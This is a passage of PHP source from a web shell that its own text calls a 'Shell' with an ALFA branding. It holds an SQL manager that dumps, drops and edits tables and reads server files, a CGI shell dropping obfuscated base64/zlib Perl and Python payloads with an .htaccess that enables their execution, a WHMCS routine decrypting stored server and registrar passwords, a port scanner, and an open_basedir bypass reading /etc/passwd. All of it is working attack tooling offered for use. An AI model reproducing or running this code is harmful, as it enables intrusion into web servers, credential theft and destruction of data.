"; alfafooter(); } function alfasql(){ if(!isset($_POST['sql_host'])){ $_POST['sql_host'] = $_SESSION["sql_host"]; $_POST['sql_login'] = $_SESSION["sql_login"]; $_POST['sql_pass'] = $_SESSION["sql_pass"]; $_POST['sql_base'] = $_SESSION["sql_base"]; } class DbClass{ public $type; public $link; public $res; function __construct($type){ $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type){ case 'mysql': if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db){ switch($this->type){ case 'mysql': if(@mysqli_select_db($db))return true; break; } return false; } function query($str){ switch($this->type){ case 'mysql': return $this->res = @mysqli_query($this->link,$str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch(){ $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type){ case 'mysql': return@mysqli_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs(){ switch($this->type){ case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables(){ switch($this->type){ case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error(){ switch($this->type){ case 'mysql': return @mysqli_error($this->link); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str){ switch($this->type){ case 'mysql': if(function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link,$str); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str){ switch($this->type){ case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table solevisible'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false){ switch($this->type){ case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysqli_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $head = true; while($item = $this->fetch()){ $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "''"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){ $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "calfa866": $db->setCharset('calfa866'); break; } $json = json_decode($_POST['alfa2'],true); if(count($json['tbl'])>0){ if($_POST['alfa1']=='dumpfile'){ if($fp = @fopen($json['file'],'w')){ foreach($json['tbl'] as $v)$db->dump($v, $fp); fclose($fp); $dumpStatus = true; }}else{ foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v); } } unset($_POST['alfa2']); } alfahead(); echo "
| Sql Manager |

".getConfigHtml('all')."

TYPE
HOST
DB USER
DB PASS
DB NAME
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { $_SESSION["sql_host"] = $_POST['sql_host']; $_SESSION["sql_login"] = $_POST['sql_login']; $_SESSION["sql_pass"] = $_POST['sql_pass']; $_SESSION["sql_base"] = $_POST['sql_base']; switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "calfa866": $db->setCharset('calfa866'); break; } $db->setCharset('utf8'); $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo "
count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:


"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)){ list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "

File path:
".($dumpStatus?'

~ Download File ~

':'')."
"; if(@$_POST['alfa1'] == 'select'){ $_POST['alfa1'] = 'query'; $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1; $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`'); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['alfa2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['alfa3'] > 1) echo " < Prev"; if($_POST['alfa3'] < $pages) echo " Next >"; $_POST['alfa3']--; $cache_table = $_POST['alfa2']; if($_POST['type']=='pgsql') $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30); else $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30'; echo "

"; } if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) { $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'")); $db->query(@$_POST['alfa2']); if($db->res !== false){ $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title){ echo ''; foreach($item as $key => $value){ echo ''; } reset($item); $title=true; echo ''; $line = 2; } if($cache_table!=''){ $cacheMsg = 'Edit'; }else{ $cacheMsg ='-'; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value){ if($value == null) echo ''; else echo ''; } echo ''; } echo '
#'.$key.'
'.$cacheMsg.'null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo(''); if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){ $data = explode(':',$_POST['alfa3']); echo ('

Table:
'.$data[0].'

'); echo("
"); if($data[1] != '0'){ $data[2] = __ZGVjb2Rlcg($data[2]); $data[2] = str_replace('"','',$data[2]); $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'")); $fetch['__ALFAKEY'] = $data[1]; $fetch['__ALFAKEYVAL'] = $data[2]; }else{ $d = __ZGVjb2Rlcg($data[2]); $fetch = json_decode($d, true); } foreach($fetch as $key => $value){ if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue; $value = htmlspecialchars($value); echo(""); } echo("
$key
$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'>
"); } if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){ $data = json_decode($_POST['alfa2'], true); $alfadata = $data['__ALFADATA']; $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true); $keyval = array(); echo ('

Table:
'.$data['__ALFATBL'].'

'); echo("
"); $set = ''; foreach($data as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue; if($data2['__ALFAKEY']==$key){ $keyval['__ALFAKEY'] = $key; $keyval['__ALFAKEYVAL'] = $value; } $set .= "`$key` = '".addslashes($value)."',"; $value = htmlspecialchars($value); echo(""); } unset($data['__ALFADATA']); echo("
$key
$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'>
"); if(!isset($data2['__ALFAKEY'])){ $where = ''; foreach($data2 as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue; $value = addslashes($value); $where .= "`$key` = '$value' AND "; } $where = substr($where, 0, -4); }else{ $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'"; } $set = substr($set, 0, -1); $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where")); if($db->error()) echo '
Error: '.htmlspecialchars($db->error()).'
'; else echo("Success...!"); } if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){ echo "

Query:

"; } echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file:
"; } if(@$_POST['alfa1'] == 'loadfile'){ $file = $db->loadFile($_POST['alfa2']); echo '
'.htmlspecialchars($file['file']).'
'; } }else{ echo htmlspecialchars($db->error()); } echo '
'; alfafooter(); } function alfaselfrm(){ if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){ echo(__pre().'
'); if(@unlink($GLOBALS['__file_path'])){ echo('Shell has been removed :)'); }else{ echo 'unlink error!'; } echo('
'); } if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){ echo "
"; echo "

"; echo '

Do you want to destroy me?!
Yes'; echo '

'; } } function alfacgishell(){ alfahead(); $div = ""; if(!in_array($_POST['alfa1'],array('perl','py'))){ $div = ""; echo '

| CGI Shell |

| Perl | | Python | '; } if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){ @mkdir('cgialfa',0755); @chdir('cgialfa'); alfacgihtaccess('cgi'); $name = $_POST['alfa1'].'.alfa'; $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';; $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))'; if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;} if(__write_file($name,$code)){ @chmod($name,0755); echo ''; } } echo $div; alfafooter(); } function alfaWhmcs(){ alfahead(); echo '
'; function decrypt($string,$cc_encryption_hash){ $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen ($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; } function _hash($string) { if(function_exists('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8,9,10); echo "

| WHMCS DeCoder |

".getConfigHtml('whmcs')."

"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "

"; if($_POST['alfa5']!=''){ $db_host=($_POST['alfa7']); $db_username=($_POST['alfa3']); $db_password=($_POST['alfa4']); $db_name=($_POST['alfa5']); $cc_encryption_hash=($_POST['alfa6']); echo __pre(); $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn)); $query = mysqli_query($conn,"SELECT * FROM tblservers"); $num = mysqli_num_rows($query); if ($num > 0){ for($i=0; $i <=$num-1; $i++){ $v = @mysqli_fetch_array($query); $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("
"); $password = decrypt ($v['password'], $cc_encryption_hash); echo(""); echo(""); echo(""); echo(""); echo(""); echo(""); echo "
Type$type
Active$active
Hostname$hostname
Ip$ipaddress
Username$username
Password$password


"; } $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0){ for($i=0; $i <=$num1 -1; $i++){ $v = mysqli_fetch_array($query1); $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt($v['value'], $cc_encryption_hash); if ($value==""){ $value=0; } echo("
Domain Reseller
"); echo("
"); echo(""); echo(""); echo(""); echo "
Register$registrar
Setting$setting
Value$value


"; } } }else{__alert('tblservers is Empty...!');}; } echo "
"; alfafooter(); } function alfaportscanner(){ alfahead(); echo '

| Port Scaner |

Host:
Port start:
Port end:

'; $start = strip_tags($_POST['alfa2']); $end = strip_tags($_POST['alfa3']); $host = strip_tags($_POST['alfa4']); if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){ echo __pre(); $packetContent = "GET / HTTP/1.1\r\n\r\n"; if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent); else{ $packetContent = str_replace(array("\r","\n"), "", $packetContent); $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent); } for($i = $start; $i<=$end; $i++){ $sock = @fsockopen($host, $i, $errno, $errstr, 3); if($sock){ stream_set_timeout($sock, 5); fwrite($sock, $packetContent."\r\n\r\n\x00"); $counter = 0; $maxtry = 1; $bin = ""; do{ $line = fgets($sock, 1024); if(trim($line)=="")$counter++; $bin .= $line; }while($counter<$maxtry); fclose($sock); echo "

Port $i is open

"; echo "

"; } flush(); } } echo '
'; alfafooter(); } function alfacgihtaccess($m,$d='', $symname=false){ $readme = ""; if($symname){$readme="\nReadmeName ".trim($symname);} if($m=='cgi'){ $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa"; }elseif($m=='sym'){ $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all"; }elseif($m=='shtml'){ $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml"; } @__write_file($d.'.htaccess',$code); } function alfabasedir(){ alfahead(); echo '

| Open Base Dir |

'; $passwd = _alfa_file('/etc/passwd'); if(is_array($passwd)){ $users = array(); $makepwd = alfaMakePwd(); $basedir = @ini_get('open_basedir'); $safe_mode = @ini_get('safe_mode'); if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){ $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; alfaWriteTocgiapi("basedir.alfa",$bash); $bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true); $users = json_decode($bash_users, true); $x=count($users); if($x>=2){array_pop($users);--$x;} } if(!$basedir&&!$safe_mode){ $x=0; foreach($passwd as $str){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = str_replace("{user}", $username, $makepwd); if(($username != '')){ if (@is_readable($dirz)){ array_push($users,$username); $x++; }}} } echo '

